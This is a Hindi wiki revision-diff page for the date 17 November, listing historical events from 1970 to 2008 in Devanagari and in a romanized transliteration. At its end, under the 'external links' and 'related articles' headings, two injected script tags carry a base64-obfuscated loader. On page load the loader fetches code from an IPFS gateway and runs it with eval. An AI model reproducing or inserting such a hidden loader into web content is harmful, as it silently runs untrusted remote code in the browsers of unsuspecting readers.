Difference between revisions of "17 नवंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 8: Line 8:
 
* [[1995]] - ओसाका में एशिया प्रशांत आर्थिक संघ (एपेक) का सातवां शिखर सम्मेलन शुरू।  
 
* [[1995]] - ओसाका में एशिया प्रशांत आर्थिक संघ (एपेक) का सातवां शिखर सम्मेलन शुरू।  
 
* [[2005]] - श्रीलंका में राष्ट्रपति चुनाव सम्पन्न। इटली की संसद ने व्यापक संविधान संशोधनों को मंजूरी प्रदान की। वोल्कर समिति के दस्तावेज उपलब्ध कराने का संयुक्त राष्ट्र पर दबाव बढ़ा।  
 
* [[2005]] - श्रीलंका में राष्ट्रपति चुनाव सम्पन्न। इटली की संसद ने व्यापक संविधान संशोधनों को मंजूरी प्रदान की। वोल्कर समिति के दस्तावेज उपलब्ध कराने का संयुक्त राष्ट्र पर दबाव बढ़ा।  
 +
* [[2006]] - अमेरिकी सीनेट ने भारत-अमेरिका परमाणु संधि को मंजूरी दी।
 
* [[2008]] - जे. एस. डब्ल्यू स्टील लिमिटेड ने बेल्कारी में 220 करोड़ की लागत से इस्पात संयंत्र स्थापित करने के ब्रिटेन की सीबरफील्ड रीवे स्ट्रेक्चर के साथ में समझौता किया। [[मालेगाँव]] ब्लास्ट की जाँच कर रही मुम्बई एटीएस ने अपने पूर्व के वक्तव्य को पलटते हुए कहा कि समझौता एक्सप्रेस ब्लास्ट में आरडीएक्स लेफ्टिनेंट कर्नल श्रीकान्त पुरोहित ने उपलब्ध नहीं कराये थे। मालेगाँव ब्लास्ट मामला सर्वोच्च न्यायालय में पहुँचा। [[भारत]] ने दूसरे वन डे में [[इंग्लैण्ड]] को 54 रनों से हराया। चन्द्रयान-1 की सफलता के बाद केन्द्र सरकार ने चन्द्रयान-2 की मंज़ूरी दी।
 
* [[2008]] - जे. एस. डब्ल्यू स्टील लिमिटेड ने बेल्कारी में 220 करोड़ की लागत से इस्पात संयंत्र स्थापित करने के ब्रिटेन की सीबरफील्ड रीवे स्ट्रेक्चर के साथ में समझौता किया। [[मालेगाँव]] ब्लास्ट की जाँच कर रही मुम्बई एटीएस ने अपने पूर्व के वक्तव्य को पलटते हुए कहा कि समझौता एक्सप्रेस ब्लास्ट में आरडीएक्स लेफ्टिनेंट कर्नल श्रीकान्त पुरोहित ने उपलब्ध नहीं कराये थे। मालेगाँव ब्लास्ट मामला सर्वोच्च न्यायालय में पहुँचा। [[भारत]] ने दूसरे वन डे में [[इंग्लैण्ड]] को 54 रनों से हराया। चन्द्रयान-1 की सफलता के बाद केन्द्र सरकार ने चन्द्रयान-2 की मंज़ूरी दी।
 
==17 नवंबर को जन्मे व्यक्ति==
 
==17 नवंबर को जन्मे व्यक्ति==

Revision as of 11:58, 5 March 2012


gregori kailandar ke anusar 17 navanbar varsh ka 321 vaan (lip varsh mean yah 322 vaan) din hai. sal mean abhi aur 44 din shesh haian.

17 navanbar ki mahattvapoorn ghatanaean

  • 1970 - soviyat aantariksh yan 'lunakhod-1' chandratal par utara.
  • rani lakshmibaee ka ek mahattvapoorn patr jo ki unhoanne eest iandiya kanpani ke gavarnar janaral l aaurd dalahauzi ko likha tha landan mean british laibreri ke arkaivs mean mila haian.
  • 1995 - osaka mean eshiya prashaant arthik sangh (epek) ka satavaan shikhar sammelan shuroo.
  • 2005 - shrilanka mean rashtrapati chunav sampann. itali ki sansad ne vyapak sanvidhan sanshodhanoan ko manjoori pradan ki. volkar samiti ke dastavej upalabdh karane ka sanyukt rashtr par dabav badha.
  • 2006 - ameriki sinet ne bharat-amerika paramanu sandhi ko manjoori di.
  • 2008 - je. es. dablyoo stil limited ne belkari mean 220 karo d ki lagat se ispat sanyantr sthapit karane ke briten ki sibaraphild rive strekchar ke sath mean samajhauta kiya. malegaanv blast ki jaanch kar rahi mumbee eties ne apane poorv ke vaktavy ko palatate hue kaha ki samajhauta eksapres blast mean aradieks lephtineant karnal shrikant purohit ne upalabdh nahian karaye the. malegaanv blast mamala sarvochch nyayalay mean pahuancha. bharat ne doosare van de mean ianglaind ko 54 ranoan se haraya. chandrayan-1 ki saphalata ke bad kendr sarakar ne chandrayan-2 ki manzoori di.

17 navanbar ko janme vyakti

17 navanbar ko hue nidhan

17 navanbar ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>